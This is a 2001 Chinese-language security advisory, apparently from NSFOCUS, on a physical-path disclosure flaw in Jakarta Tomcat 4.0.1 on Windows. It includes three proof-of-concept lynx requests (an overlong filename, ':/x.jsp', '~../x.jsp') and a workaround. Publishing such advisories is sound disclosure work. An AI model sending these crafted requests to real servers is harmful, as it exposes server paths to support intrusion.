安全研究
安全漏洞
Jakarta Tomcat 4.0.1 物理路径泄露漏洞
发布日期:2001-11-22
更新日期:2001-11-27
受影响系统:
Jakarta Tomcat v4.0.1
- Microsoft Windows 2000
描述:
Jakarta Tomcat是流行的支持JSP的服务器之一,目前最新版本是4.0.1,可以从
http://jakarta.apache.org/下载。
该软件存在一个安全问题,可能导致泄露Web物理路径。
通过发送超长或特殊请求,即可获得远程服务器的服务路径。
<*来源:analysist (
analysist@nsfocus.com)
链接:
http://archives.neohapsis.com/archives/bugtraq/2001-11/0184.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
analysist (
analysist@nsfocus.com)提供了如下测试代码:
$ lynx http://localhost:8080/`perl -e 'print "A" x 223'`.jsp
$ lynx http://localhost:8080/:/x.jsp
$ lynx http://localhost:8080/~../x.jsp
建议:
临时解决方法:
如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:
* 换用其它安全的JSP服务器
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商
的主页以获取补丁程序:
http://jakarta.apache.org/
浏览次数:4339
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载 绿盟科技给您安全的保障 |